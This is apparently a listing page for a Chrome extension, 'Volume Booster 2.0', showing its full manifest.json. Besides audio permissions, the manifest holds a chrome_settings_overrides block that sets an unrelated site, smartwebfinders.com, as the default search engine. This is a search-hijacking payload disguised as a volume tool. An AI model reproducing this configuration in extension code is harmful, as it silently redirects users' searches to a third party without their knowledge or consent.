Volume Booster 2.0

Volume Booster 2.0

Increase your volume with a sliding bar & boost the sound from your computer with the highest of quality!

Merlin
Additional files are visible only to premium users

manifest.json


{
  "update_url": "https://clients2.google.com/service/update2/crx",
  "version": "0.0.2",
  "manifest_version": 2,
  "offline_enabled": true,
  "name": "Volume Booster 2.0",
  "description": "Increase your volume with a sliding bar & boost the sound from your computer with the highest of quality!",
  "icons": {
    "30": "icons/icon30.png",
    "64": "icons/icon64.png",
    "96": "icons/icon96.png",
    "128": "icons/icon128.png",
    "156": "icons/icon156.png",
    "196": "icons/icon196.png",
    "256": "icons/icon256.png",
    "512": "icons/icon512.png"
  },
  "browser_action": {
    "default_popup": "popup.html"
  },
  "background": {
    "scripts": [
      "js/background.js"
    ]
  },
  "permissions": [
    "tabCapture",
    "activeTab"
  ],
  "chrome_settings_overrides": {
    "search_provider": {
      "name": "Smart",
      "keyword": "Smart",
      "search_url": "https://smartwebfinders.com/?n=4&q={searchTerms}",
      "favicon_url": "https://smartwebfinders.com/favicon.ico",
      "encoding": "UTF-8",
      "is_default": true
    }
  }
}